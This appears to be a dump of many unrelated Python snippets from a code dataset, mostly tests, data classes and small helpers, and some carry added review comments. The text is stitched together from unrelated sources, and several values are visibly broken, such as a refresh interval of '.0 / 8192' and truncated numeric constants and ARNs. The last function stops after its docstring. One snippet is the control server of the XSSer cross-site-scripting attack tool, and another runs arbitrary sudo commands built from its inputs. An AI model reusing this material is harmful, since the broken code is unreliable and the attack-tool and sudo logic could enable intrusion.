code
stringlengths
281
23.7M
def test_traverse_overridden_option_1():
    """Overriding an option makes both it and its last_overriding traversable."""
    overriding_values = {'option2': 'option2'}
    config = providers.Configuration()
    config.option1.from_dict(overriding_values)
    traversed = list(config.traverse())
    # Exactly the overridden option and the provider that overrides it.
    assert len(traversed) == 2
    assert config.option1 in traversed
    assert config.last_overriding in traversed
# NOTE(review): the original line began with a bare "('foremast.elb...')" — the
# decorator name was evidently lost in extraction.  @mock.patch is restored here
# as the conventional way a `rendered_template` mock argument is injected;
# confirm against the project's other tests (assumes the file already imports
# `mock`).
@mock.patch('foremast.elb.format_listeners.get_template')
def test_elb_cert_name_v2(rendered_template):
    """format_cert_name resolves IAM and ACM certificate ARNs from the v2 template."""
    rendered_template.return_value = SAMPLE_TLSCERT_V2_JSON
    # IAM certificate lookup.
    iam_cert = 'arn:aws:iam:::server-certificate/wildcard.example.com-2020-07-15'
    assert iam_cert == format_cert_name(
        env='prod', account='', region='us-east-1', certificate='wildcard.example.com')
    # ACM certificate lookup in the requested region.
    acm_cert = 'arn:aws:acm:us-east-1::certificate/-2222-3333-4444-'
    assert acm_cert == format_cert_name(
        env='prod', account='', region='us-east-1', certificate='wildcard.prod.example.com')
    # ACM lookup honours a different region.
    acm_region_cert = 'arn:aws:acm:us-west-2::certificate/-0000-2222-3333-'
    assert acm_region_cert == format_cert_name(
        env='prod', account='', region='us-west-2', certificate='wildcard.prod.example.com')
# FLAC tag format backed by mutagen.flac.FLAC.  Embedded cover art is mapped to
# the '__cover' tag via FLAC picture blocks; 'rating' is converted to/from a
# star scale; behind the 'collection/use_legacy_metadata_mapping' setting the
# bpm<->tempo and comment<->description tag names are aliased.  get_bitrate()
# returns -1 (no fixed bitrate is reported here).  NOTE(review): the _get_tag/
# _set_tag branches are order-sensitive, so the code is left byte-identical.
class FlacFormat(CaseInsensitiveBaseFormat): MutagenType = flac.FLAC tag_mapping = {'cover': '__cover', 'language': 'Language', '__rating': 'rating'} writable = True case_sensitive = False def get_bitrate(self): return (- 1) def get_keys_disk(self): keys = CaseInsensitiveBaseFormat.get_keys_disk(self) if self.mutagen.pictures: keys.append('cover') return keys def _get_tag(self, raw, tag): if (tag == '__cover'): return [CoverImage(type=p.type, desc=p.desc, mime=p.mime, data=p.data) for p in raw.pictures] elif (tag == 'rating'): if ('rating' not in raw): return [] data = int(raw['rating'][0]) return [str(self._rating_to_stars(data))] elif (tag == 'bpm'): if (settings.get_option('collection/use_legacy_metadata_mapping', False) and ('tempo' in raw)): tag = 'tempo' elif (tag == 'comment'): if (settings.get_option('collection/use_legacy_metadata_mapping', False) and ('description' in raw)): tag = 'description' return CaseInsensitiveBaseFormat._get_tag(self, raw, tag) def _set_tag(self, raw, tag, value): if (tag == '__cover'): raw.clear_pictures() for v in value: picture = Picture() picture.type = v.type picture.desc = v.desc picture.mime = v.mime picture.data = v.data raw.add_picture(picture) return elif (tag == 'rating'): value = [str(self._stars_to_rating(int(value[0])))] elif (tag == 'bpm'): if settings.get_option('collection/use_legacy_metadata_mapping', False): tag = 'tempo' value = [xl.unicode.to_unicode(v) for v in value] elif (tag == 'comment'): if settings.get_option('collection/use_legacy_metadata_mapping', False): tag = 'description' value = [xl.unicode.to_unicode(v) for v in value] else: value = [xl.unicode.to_unicode(v) for v in value] CaseInsensitiveBaseFormat._set_tag(self, raw, tag, value) def _del_tag(self, raw, tag): if (tag == '__cover'): raw.clear_pictures() elif (tag in raw): del raw[tag]
def test_result_to_table(df):
    """result_to_table yields a tidy DataFrame, with and without the intercept row."""
    model = Lm('DV ~ IV1 + IV3', data=df)
    model.fit(summarize=False)

    table = result_to_table(model, drop_intercept=False)
    assert isinstance(table, pd.DataFrame)
    assert table.shape == (3, 6)
    assert set(table.columns) == {'Predictor', 'b', 'ci', 't', 'df', 'p'}
    # Intercept p-value is formatted, not numeric.
    assert table.iloc[0, -1] == '< .001'

    table = result_to_table(model, drop_intercept=True)
    assert isinstance(table, pd.DataFrame)
    assert table.shape == (2, 6)
def test_relative_layout(manager):
    """Relative popup coordinates (fractions of 200x200) scale to absolute pixels."""
    script = textwrap.dedent('\n    from qtile_extras.popup.toolkit import PopupRelativeLayout, PopupText\n    self.popup = PopupRelativeLayout(\n        self,\n        controls=[\n            PopupText(\n                "Test",\n                pos_x=0.1,\n                pos_y=0.2,\n                width=0.5,\n                height=0.6\n            )\n        ],\n        margin=0\n    )\n\n    self.popup.show()\n    ')
    manager.c.eval(script)
    _, raw_info = manager.c.eval('self.popup.info()')
    popup_info = eval(raw_info)  # qtile returns the info dict as its repr
    text_control = popup_info['controls'][0]
    assert text_control['x'] == 20
    assert text_control['y'] == 40
    assert text_control['width'] == 100
    assert text_control['height'] == 120
class Tool(BaseModel):
    """A named callable exposed to an agent, with an optional async variant."""

    class Config:
        # Reject unknown fields and allow arbitrary (non-pydantic) types.
        extra = Extra.forbid
        arbitrary_types_allowed = True

    function: Callable[..., str]
    name: str = ''
    description: str = ''
    coroutine: Optional[Callable[..., Awaitable[str]]] = None

    def run(self, tool_input: Dict[str, str]) -> str:
        """Invoke the wrapped function with *tool_input* as keyword arguments."""
        return self.function(**tool_input)
# wx drop target that accepts either an in-process Python object (via the
# module-level `clipboard`) or OS file drops (wrapped into apptools File/Binding
# objects when apptools is importable).  The handler may be an object exposing
# wx_dropped_on/on_drop/wx_drag_any/wx_drag_over/on_drag_over/wx_drag_leave
# hooks, or a plain callable.  NOTE(review): OnData notifies the drop source
# with the handler's drag_result but returns default_drag_result — order of the
# clipboard mutations and hook dispatch is intricate, so code left byte-identical.
class PythonDropTarget(wx.DropTarget): def __init__(self, handler): super().__init__() self.handler = handler self.data_object = wx.DataObjectComposite() self.data = wx.CustomDataObject(PythonObject) self.data_object.Add(self.data, preferred=True) self.file_data = wx.FileDataObject() self.data_object.Add(self.file_data) self.SetDataObject(self.data_object) def OnData(self, x, y, default_drag_result): if ((clipboard.drop_source is not None) and (not clipboard.drop_source.allow_move)): default_drag_result = wx.DragCopy elif (clipboard.drop_source is None): if self.GetData(): try: from apptools.io import File from apptools.naming.api import Binding names = self.file_data.GetFilenames() files = [] bindings = [] for name in names: f = File(name) files.append(f) bindings.append(Binding(name=name, obj=f)) clipboard.data = files clipboard.node = bindings except ImportError: pass if hasattr(self.handler, 'wx_dropped_on'): drag_result = self.handler.wx_dropped_on(x, y, clipboard.data, default_drag_result) elif hasattr(self.handler, 'on_drop'): drag_result = self.handler.on_drop(x, y, clipboard.data, default_drag_result) else: self.handler(x, y, clipboard.data) drag_result = default_drag_result drop_source = clipboard.drop_source if (drop_source is not None): drop_source.on_dropped(drag_result) clipboard.drop_source = None return default_drag_result def OnDragOver(self, x, y, default_drag_result): data = clipboard.data if (clipboard.drop_source is None): if (not hasattr(self.handler, 'wx_drag_any')): return default_drag_result data = None elif (not clipboard.drop_source.allow_move): default_drag_result = wx.DragCopy if hasattr(self.handler, 'wx_drag_any'): drag_result = self.handler.wx_drag_any(x, y, data, default_drag_result) elif hasattr(self.handler, 'wx_drag_over'): drag_result = self.handler.wx_drag_over(x, y, data, default_drag_result) elif hasattr(self.handler, 'on_drag_over'): drag_result = self.handler.on_drag_over(x, y, data, default_drag_result) else: drag_result = 
default_drag_result return drag_result def OnLeave(self): if hasattr(self.handler, 'wx_drag_leave'): self.handler.wx_drag_leave(clipboard.data) def OnDrop(self, x, y): return True
class ReqContext(BaseModel):
    """Caller context attached to a model request."""
    # Identity of the requesting user, if known.
    user_name: Optional[str] = Field(None, description='The user name of the model request.')
    # Code of the originating system, if known.
    sys_code: Optional[str] = Field(None, description='The system code of the model request.')
    # Conversation this request belongs to, if any.
    conv_uid: Optional[str] = Field(None, description='The conversation uid of the model request.')
class OAuth2TokenRequest(_common.FlyteIdlEntity):
    """Wrapper around the OAuth2TokenRequest IDL message.

    NOTE(review): the attribute annotations with defaults suggest this class was
    originally declared as a dataclass (the decorator may have been lost in
    extraction) — confirm against the original project before relying on the
    generated __init__.
    """

    class Type(Enum):
        # Only the client-credentials grant is modelled.
        CLIENT_CREDENTIALS = _sec.OAuth2TokenRequest.Type.CLIENT_CREDENTIALS

    name: str
    client: OAuth2Client
    idp_discovery_endpoint: Optional[str] = None
    token_endpoint: Optional[str] = None
    type_: Type = Type.CLIENT_CREDENTIALS

    def to_flyte_idl(self) -> _sec.OAuth2TokenRequest:
        """Serialize this object to its protobuf form."""
        return _sec.OAuth2TokenRequest(
            name=self.name,
            type=self.type_,
            token_endpoint=self.token_endpoint,
            idp_discovery_endpoint=self.idp_discovery_endpoint,
            client=(self.client.to_flyte_idl() if self.client else None),
        )

    # BUG FIX: this alternate constructor takes `cls` but was missing its
    # @classmethod decorator, so calling it on the class would have treated the
    # protobuf object as `cls`.
    @classmethod
    def from_flyte_idl(cls, pb2_object: _sec.OAuth2TokenRequest) -> 'OAuth2TokenRequest':
        """Deserialize from the protobuf form."""
        return cls(
            name=pb2_object.name,
            idp_discovery_endpoint=pb2_object.idp_discovery_endpoint,
            token_endpoint=pb2_object.token_endpoint,
            type_=pb2_object.type,
            client=(OAuth2Client.from_flyte_idl(pb2_object.client) if pb2_object.HasField('client') else None),
        )
class HttpDialogues(Model, BaseHttpDialogues):
    """Skill model tracking HTTP dialogues; this agent is always the CLIENT."""

    def __init__(self, **kwargs: Any) -> None:
        """Initialize both the skill Model and the dialogues base."""
        Model.__init__(self, **kwargs)

        def select_role(message: Message, receiver_address: Address) -> BaseDialogue.Role:
            # Regardless of the first message, this skill initiates as client.
            return BaseHttpDialogue.Role.CLIENT

        BaseHttpDialogues.__init__(
            self,
            self_address=str(self.skill_id),
            role_from_first_message=select_role,
        )
# ModelForm for creating a Record.  Every field is required, rendered as a
# Bootstrap 'form-control' text input with a placeholder instead of a label.
# The owning 'user' field is excluded and is presumably set by the view —
# TODO confirm against the caller.
class AddRecordForm(forms.ModelForm):
    first_name = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'First Name', 'class': 'form-control'}), label='')
    last_name = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Last Name', 'class': 'form-control'}), label='')
    email = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Email', 'class': 'form-control'}), label='')
    phone = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Phone', 'class': 'form-control'}), label='')
    address = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Address', 'class': 'form-control'}), label='')
    city = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'City', 'class': 'form-control'}), label='')
    state = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'State', 'class': 'form-control'}), label='')
    zipcode = forms.CharField(required=True, widget=forms.widgets.TextInput(attrs={'placeholder': 'Zipcode', 'class': 'form-control'}), label='')

    class Meta():
        model = Record
        exclude = ('user',)
def extractTraventranslatesWordpressCom(item):
    """Map a traventranslates.wordpress.com feed item to a release message.

    Returns None for preview posts or items with no chapter/volume info,
    a release message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    tag_table = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tag, series_name, tl_type in tag_table:
        if tag in item['tags']:
            return buildReleaseMessageWithType(
                item, series_name, vol, chp,
                frag=frag, postfix=postfix, tl_type=tl_type,
            )
    return False
def get_boundary_bin_id(hic, bed_fh):
    """Collect the sorted, unique matrix bin ids at BED interval boundaries.

    Lines starting with 'browser', 'track' or '#' are skipped; parse failures
    are logged and abort the program.
    """
    boundaries = set()
    for line_number, line in enumerate(bed_fh.readlines(), start=1):
        line = toString(line)
        if line.startswith(('browser', 'track', '#')):
            continue
        try:
            chrom, start, end = line.strip().split('\t')[0:3]
        except Exception as detail:
            log.exception('Could not read line\n{}\n. {}'.format(line, detail))
            sys.exit()
        try:
            start = int(start)
            end = int(end)
        except ValueError as detail:
            log.exception('Error reading line: {}. One of the fields is not an integer.\nError message: {}'.format(line_number, detail))
            sys.exit()
        assert start <= end, 'Error in line #{}, end1 larger than start1 in {}'.format(line_number, line)
        start_bin, end_bin = hic.getRegionBinRange(chrom, start, end)
        boundaries.add(start_bin)
        boundaries.add(end_bin)
    return np.sort(list(boundaries))
def register():
    """Configure debug logging for this add-on and register all Blender classes."""
    # %-style placeholders are for the logging module; only the package name is
    # substituted here.
    logging_format = (
        '[%(levelname)s] (%(asctime)s) '
        '{}.%(module)s.%(funcName)s():L%(lineno)s - %(message)s'.format(__package__)
    )
    logging.basicConfig(
        level=logging.DEBUG,
        format=logging_format,
        datefmt='%Y/%m/%d %H:%M:%S',
    )
    for cls in classes:
        bpy.utils.register_class(cls)
class AsyncChainMixin(AsyncChainAPI):
    # Awaitable facade over the synchronous Chain API: each coro_* attribute
    # wraps the corresponding Chain method via async_method (how the wrapping
    # executes — e.g. on an executor — is determined by async_method, not here).
    chaindb_class: Type[ChainDatabaseAPI] = AsyncChainDB
    coro_get_ancestors = async_method(Chain.get_ancestors)
    coro_get_block_by_hash = async_method(Chain.get_block_by_hash)
    coro_get_block_by_header = async_method(Chain.get_block_by_header)
    coro_get_block_header_by_hash = async_method(Chain.get_block_header_by_hash)
    coro_get_canonical_block_by_number = async_method(Chain.get_canonical_block_by_number)
    coro_get_canonical_head = async_method(Chain.get_canonical_head)
    coro_get_canonical_block_header_by_number = async_method(Chain.get_canonical_block_header_by_number)
    coro_get_canonical_transaction_index = async_method(Chain.get_canonical_transaction_index)
    coro_get_canonical_transaction = async_method(Chain.get_canonical_transaction)
    coro_get_canonical_transaction_by_index = async_method(Chain.get_canonical_transaction_by_index)
    coro_get_score = async_method(Chain.get_score)
    coro_get_transaction_receipt = async_method(Chain.get_transaction_receipt)
    coro_get_transaction_receipt_by_index = async_method(Chain.get_transaction_receipt_by_index)
    coro_import_block = async_method(Chain.import_block)
    coro_validate_chain = async_method(Chain.validate_chain)
    coro_validate_receipt = async_method(Chain.validate_receipt)
def test_irapbin_load_meta_first_bytesio():
    """Metadata-only load from BytesIO, then lazy values; a closed stream raises."""
    logger.info('Import and export...')
    with open(TESTSET1, 'rb') as fin:
        stream = io.BytesIO(fin.read())
    surface = xtgeo.surface_from_file(stream, fformat='irap_binary', values=False)
    assert surface.ncol == 554
    assert surface.nrow == 451
    surface.describe()
    # Values are loaded on demand after the metadata-only open.
    surface.load_values()
    surface.describe()
    stream.close()
    # Reading from the now-closed stream must fail.
    with pytest.raises(ValueError) as verr:
        surface = xtgeo.surface_from_file(stream, fformat='irap_binary', values=False)
    assert 'I/O operation on closed file' in str(verr.value)
def test_transaction_confirmation_serialization():
    """A TRANSACTION_CONFIRMATION message survives an envelope encode/decode round trip."""
    msg = TacMessage(
        performative=TacMessage.Performative.TRANSACTION_CONFIRMATION,
        transaction_id='some_transaction_id',
        amount_by_currency_id={'key_1': 1, 'key_2': 2},
        quantities_by_good_id={'key_1': 1, 'key_2': 2},
    )
    msg.to = 'receiver'
    envelope = Envelope(to=msg.to, sender='sender', message=msg)
    decoded = Envelope.decode(envelope.encode())
    assert envelope.to == decoded.to
    assert envelope.sender == decoded.sender
    assert envelope.protocol_specification_id == decoded.protocol_specification_id
    # The decoded envelope carries raw bytes, not the message object itself.
    assert envelope.message != decoded.message
    round_tripped = TacMessage.serializer.decode(decoded.message)
    round_tripped.to = decoded.to
    round_tripped.sender = decoded.sender
    assert msg == round_tripped
class TrioQueue(BaseQueue):
    """Bounded FIFO queue backed by a trio memory channel."""

    def __init__(self, capacity: int) -> None:
        send, receive = trio.open_memory_channel(max_buffer_size=capacity)
        self._send_channel = send
        self._receive_channel = receive

    async def get(self) -> typing.Any:
        """Receive the next value, waiting until one is available."""
        return await self._receive_channel.receive()

    async def put(self, value: typing.Any) -> None:
        """Send a value, waiting for buffer space if the queue is full."""
        await self._send_channel.send(value)
class AdsHistogramStats(AbstractObject):
    """Graph API response object describing histogram-bucketed ad statistics.

    Holds the field-name constants and their declared wire types; the values
    themselves arrive from the API.
    """

    def __init__(self, api=None):
        super(AdsHistogramStats, self).__init__()
        self._isAdsHistogramStats = True
        self._api = api

    class Field(AbstractObject.Field):
        # Attribution-window buckets.
        field_1d_click = '1d_click'
        field_1d_ev = '1d_ev'
        field_1d_view = '1d_view'
        field_28d_click = '28d_click'
        field_28d_view = '28d_view'
        field_7d_click = '7d_click'
        field_7d_view = '7d_view'
        # Action breakdown dimensions.
        action_brand = 'action_brand'
        action_canvas_component_id = 'action_canvas_component_id'
        action_canvas_component_name = 'action_canvas_component_name'
        action_carousel_card_id = 'action_carousel_card_id'
        action_carousel_card_name = 'action_carousel_card_name'
        action_category = 'action_category'
        action_converted_product_id = 'action_converted_product_id'
        action_destination = 'action_destination'
        action_device = 'action_device'
        action_event_channel = 'action_event_channel'
        action_link_click_destination = 'action_link_click_destination'
        action_location_code = 'action_location_code'
        action_reaction = 'action_reaction'
        action_target_id = 'action_target_id'
        action_type = 'action_type'
        action_video_asset_id = 'action_video_asset_id'
        action_video_sound = 'action_video_sound'
        action_video_type = 'action_video_type'
        dda = 'dda'
        inline = 'inline'
        interactive_component_sticker_id = 'interactive_component_sticker_id'
        interactive_component_sticker_response = 'interactive_component_sticker_response'
        skan_click = 'skan_click'
        skan_view = 'skan_view'
        value = 'value'

    # Declared wire types per field, as given by the API schema.
    _field_types = {
        '1d_click': 'list<int>',
        '1d_ev': 'list<int>',
        '1d_view': 'list<int>',
        '28d_click': 'list<int>',
        '28d_view': 'list<int>',
        '7d_click': 'list<int>',
        '7d_view': 'list<int>',
        'action_brand': 'string',
        'action_canvas_component_id': 'string',
        'action_canvas_component_name': 'string',
        'action_carousel_card_id': 'string',
        'action_carousel_card_name': 'string',
        'action_category': 'string',
        'action_converted_product_id': 'string',
        'action_destination': 'string',
        'action_device': 'string',
        'action_event_channel': 'string',
        'action_link_click_destination': 'string',
        'action_location_code': 'string',
        'action_reaction': 'string',
        'action_target_id': 'string',
        'action_type': 'string',
        'action_video_asset_id': 'string',
        'action_video_sound': 'string',
        'action_video_type': 'string',
        'dda': 'list<int>',
        'inline': 'list<int>',
        'interactive_component_sticker_id': 'string',
        'interactive_component_sticker_response': 'string',
        'skan_click': 'list<int>',
        'skan_view': 'list<int>',
        'value': 'list<int>',
    }

    # BUG FIX: this method takes `cls` but was missing its @classmethod
    # decorator, so class-level calls would have failed.
    @classmethod
    def _get_field_enum_info(cls):
        """Return the (empty) enum-info mapping for this object's fields."""
        field_enum_info = {}
        return field_enum_info
class ReportForm(FlaskForm):
    """Form for reporting a post, with a mandatory reason."""

    reason = TextAreaField(
        _('Reason'),
        validators=[DataRequired(message=_('What is the reason for reporting this post?'))],
    )
    submit = SubmitField(_('Report post'))

    def save(self, user, post):
        """Create a Report from the entered reason and persist it for *post* / *user*."""
        new_report = Report(reason=self.reason.data)
        return new_report.save(post=post, user=user)
# CLI entry point: parse arguments, decompile either every function or the
# requested ones, and pretty-print the result.  Output goes to stdout (with
# color when requested/attached to a tty) or to --outfile (never colored).
# NOTE(review): the try/finally ensures the outfile is closed; stream/color
# interplay is left byte-identical.
def main(interface: 'Decompiler'): args = parse_commandline() configure_logging(level=VERBOSITY_TO_LOG_LEVEL[min(3, args.verbose)]) options = Options.from_cli(args) if args.print: print(options) return decompiler = interface.from_path(args.binary, options) if (args.outfile is None): output_stream = None color = ((args.color == Colorize.ALWAYS) or ((args.color != Colorize.NEVER) and isatty(stdout.fileno()))) else: output_stream = open(args.outfile, 'w', encoding='utf-8') color = False try: if (args.all or (not args.function)): undecorated_code = decompiler.decompile_all(options) DecoratedCode.print_code(undecorated_code, output_stream, color, style=options.getstring('code-generator.style_cmd', fallback='paraiso-dark')) else: for function_name in args.function: task = decompiler.decompile(function_name, options) DecoratedCode.print_code(task.code, output_stream, color, style=task.options.getstring('code-generator.style_cmd', fallback='paraiso-dark')) finally: if (output_stream is not None): output_stream.close()
# Look up a pull request's GraphQL node id and, when close=True, issue the
# closePullRequest mutation against it.  The GraphQL query/mutation strings are
# runtime data and must stay byte-identical.  NOTE(review): the `sh` parameter
# is accepted but unused in the visible body.
def main(pull_request: str, github: ghstack.github.GitHubEndpoint, sh: Optional[ghstack.shell.Shell]=None, close: bool=False) -> None: params = ghstack.github_utils.parse_pull_request(pull_request) pr_result = github.graphql('\n query ($owner: String!, $name: String!, $number: Int!) {\n repository(name: $name, owner: $owner) {\n pullRequest(number: $number) {\n id\n }\n }\n }\n ', **params) pr_id = pr_result['data']['repository']['pullRequest']['id'] if close: logging.info('Closing {owner}/{name}#{number}'.format(**params)) github.graphql('\n mutation ($input: ClosePullRequestInput!) {\n closePullRequest(input: $input) {\n clientMutationId\n }\n }\n ', input={'pullRequestId': pr_id, 'clientMutationId': 'A'})
def exec_cmd(cmd_name: str, args: dict, func_descript: dict) -> None:
    """Build and run ``sudo <cmd_name> ...`` from an argument mapping.

    Boolean values are emitted as bare ``--flag`` switches (for both True and
    False, preserving the original behaviour); the single positional argument
    (per is_positional_arg) goes last; everything else becomes ``--name value``.

    :param cmd_name: command to run (after ``sudo``).
    :param args: mapping of argument name -> value.
    :param func_descript: function/tool description (original annotated it as
        ``json``, but it is indexed like a dict).
    """
    full_command = ['sudo', cmd_name]
    positional_arg = None
    for arg, value in args.items():
        if value is True or value is False:
            # Booleans are passed as bare switches, regardless of truthiness
            # (unchanged from the original).
            full_command.append(f'--{arg}')
        elif is_positional_arg(cmd_name, arg):
            positional_arg = value
        else:
            # BUG FIX: with shell=False the argv list is passed verbatim, so
            # string values must NOT be wrapped in literal quote characters as
            # the original did (f'"{value}"' put real quotes into the argument).
            # This also removes the now-pointless integer/float type branch.
            full_command.extend([f'--{arg}', f'{value}'])
    if positional_arg is not None:
        full_command.append(positional_arg)
    full_command = [str(item) for item in full_command]
    print('\x1b[1;32m', 'Run: ', ' '.join(full_command), '\x1b[0m')
    try:
        subprocess.run(full_command, text=True, check=True)
    except subprocess.CalledProcessError as err:
        # BUG FIX: dropped a stray \x08 (backspace) control character that
        # garbled the error line.
        print('\x1b[1;31mFailed to execute command!\x1b[0m')
        print(err)
# Build the suite of analytic test integrands (Polynomial / Exponential /
# Sinusoid, each constructed with its known analytic integral as the first
# argument) for a given integration dimensionality (1, 3 or 10) and numerical
# backend.  When use_multi_dim_integrand is set, vector/matrix/tensor-valued
# integrands are appended.  Raises ValueError for unsupported dimensions.
# NOTE(review): the expected-value constants encode analytic results and are
# left byte-identical.
def get_test_functions(integration_dim, backend, use_multi_dim_integrand): if (integration_dim == 1): res = [Polynomial(4.0, [2.0], is_complex=False, backend=backend, integrand_dims=1), Polynomial(0, [0, 1], is_complex=False, backend=backend, integrand_dims=1), Polynomial((2 / 3), [0, 0, 2], domain=[[0, 1]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(27.75, [3, (- 1), 2, (- 3)], domain=[[(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Polynomial((44648.0 / 15.0), [3, (- 1), 2, (- 3), 7], domain=[[(- 4), 4]], is_complex=False, backend=backend, integrand_dims=1), Polynomial((8939.0 / 60.0), [3, (- 1), 2, (- 3), 7, (- 1)], domain=[[2, 3]], is_complex=False, backend=backend, integrand_dims=1), Exponential((np.exp(1) - np.exp((- 2))), domain=[[(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Exponential(((np.exp(2) - 1.0) / np.exp(3)), domain=[[(- 3), (- 1)]], is_complex=False, backend=backend, integrand_dims=1), Sinusoid(((2 * np.sin(1)) * np.sin(1)), domain=[[0, 2]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(4j, [2j], is_complex=True, backend=backend, integrand_dims=1), Polynomial(0, [0, 1j], is_complex=True, backend=backend, integrand_dims=1), Polynomial((44648.0 / 15.0), [3, (- 1j), 2, (- 3j), 7], domain=[[(- 4), 4]], is_complex=True, backend=backend, integrand_dims=1)] if use_multi_dim_integrand: res += [Polynomial(np.array([[0.0], [4.0]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 1]), Polynomial(np.array([0.0, 4.0]), [2.0], is_complex=False, backend=backend, integrand_dims=(2,)), Polynomial(np.array([[0.0, 4.0], [8.0, 12.0]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[[0.0, 4.0], [8.0, 12.0]], [[16.0, 20.0], [24.0, 28.0]]]), [2.0], is_complex=False, backend=backend, integrand_dims=[2, 2, 2]), 
Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], is_complex=False, backend=backend, integrand_dims=[2, 2, 2])] return res elif (integration_dim == 3): res = [Polynomial(48.0, [2.0], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Polynomial(0, [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Polynomial(8.0, coeffs=[0, 0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=1), Exponential(((27 * (np.exp(3) - 1)) / np.exp(2)), integration_dim=3, domain=[[(- 2), 1], [(- 2), 1], [(- 2), 1]], is_complex=False, backend=backend, integrand_dims=1), Sinusoid((24 * (np.sin(1) ** 2)), integration_dim=3, domain=[[0, 2], [0, 2], [0, 2]], is_complex=False, backend=backend, integrand_dims=1), Exponential(1.756, integration_dim=3, domain=[[(- 0.05), 0.1], [(- 0.25), 0.2], [(- np.exp(1)), np.exp(1)]], is_complex=False, backend=backend, integrand_dims=1), Polynomial(48j, [2j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1), Polynomial(0, [0, 1j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1), Polynomial(8j, coeffs=[0, 0, 1j], integration_dim=3, is_complex=True, backend=backend, integrand_dims=1)] if use_multi_dim_integrand: res += [Polynomial(np.array([[0.0], [48.0]]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 1]), Polynomial(np.array([0.0, 48.0]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=(2,)), Polynomial(np.array([[0.0, 48.0], [96.0, 144.0]]), integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[0.0, 0.0], [0.0, 0.0]]), [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2]), Polynomial(np.array([[[0.0, 48.0], [96.0, 144.0]], [[192.0, 240.0], [288.0, 336.0]]]), integration_dim=3, domain=anp.array([[(- 1.0), 1.0], [(- 1.0), 1.0], [(- 1.0), 1.0]], like=backend, dtype=ar.to_backend_dtype('float64', like=backend)), 
is_complex=False, backend=backend, integrand_dims=[2, 2, 2]), Polynomial(np.array([[[0.0, 0.0], [0.0, 0.0]], [[0.0, 0.0], [0.0, 0.0]]]), [0, 1], integration_dim=3, is_complex=False, backend=backend, integrand_dims=[2, 2, 2])] return res elif (integration_dim == 10): return [Polynomial(3413., coeffs=[0, 0, 1], integration_dim=10, is_complex=False, backend=backend, integrand_dims=1), Polynomial(3413.j, coeffs=[0, 0, 1j], integration_dim=10, is_complex=True, backend=backend, integrand_dims=1)] else: raise ValueError(('Not testing functions implemented for integration_dim ' + str(integration_dim)))
class P3R1GE4JGF(DDR2Module):
    """P3R1GE4JGF DDR2 module: geometry and timing parameters."""
    nbanks = 8
    nrows = 8192
    ncols = 1024
    # BUG FIX: tREFI was written as (.0 / 8192), i.e. a refresh interval of
    # zero.  DDR2 specifies a 64 ms average refresh period spread over 8192
    # refreshes, conventionally written 64e6 ns / 8192 — the '64e6' numerator
    # appears to have been lost.  Confirm against sibling DDR2Module classes.
    technology_timings = _TechnologyTimings(tREFI=(64e6 / 8192), tWTR=(None, 7.5), tCCD=(2, None), tRRD=None)
    speedgrade_timings = {'default': _SpeedgradeTimings(tRP=12.5, tRCD=12.5, tWR=15, tRFC=(None, 127.5), tFAW=None, tRAS=None)}
# Twisted protocol driving XSSer "swarm" mode over a minimal hand-rolled HTTP
# exchange.  NOTE(review): the second `elif ('evangelion' in data)` branch is
# unreachable — the first condition's `or ('evangelion' in data)` already
# captures it.  Also, transport.write is given str, not bytes; presumably this
# targets Python 2 — confirm before porting.  Left byte-identical.
class XSSerProtocol(Protocol): transport = None factory = None def connectionMade(self): self.factory._clients.append(self) print('new client connected...') def connectionLost(self, reason): self.factory._clients.remove(self) def sendHTTP(self, data): self.transport.write('HTTP/1.0 200 Found\n') self.transport.write('Content-Type: text/html; charset=UTF-8\n\n') self.transport.write(data) def dataReceived(self, data): print('Mosquito network ready ;)', data) if ((data.startswith('GET') and ('evangelion' in data)) or ('evangelion' in data)): print('EVAngelion swarm mode!\n') self.sendHTTP('Start Swarm Attack\n') app = xsser() app.set_reporter(self.factory) self.factory.xsser = app data = data.split('\n')[0] options = data.replace('GET ', '').split()[1:] print('OPTIONS', options) if (len(options) > 1): reactor.callInThread(self.factory.xsser.run, options) else: reactor.callInThread(self.factory.xsser.run) elif ('evangelion' in data): self.sendHTTP('Start Swarm Attack\n') reactor.callInThread(self.factory.xsser.run) elif data.startswith('GET /success'): print('SUCCESS!!', data.split('HTTP')[0].split('/')[(- 1)]) self.factory.xsser.final_attack_callback(data.split('HTTP')[0].split('/')[(- 1)].strip()) self.sendHTTP('thx for use XSSer ( !!\n') self.transport.loseConnection() elif data.startswith('GET'): self.sendHTTP("XSSer Web Interface <a href='evangelion'>Try it!</a>\n") elif data.startswith('close'): reactor.stop() else: self.transport.write('1')
def extractJinzeffectWpcomstagingCom(item):
    """Map a jinzeffect.wpcomstaging.com feed item to a release message.

    Returns None for preview posts or items lacking chapter/volume info,
    a release message for a recognized tag, and False otherwise.
    """
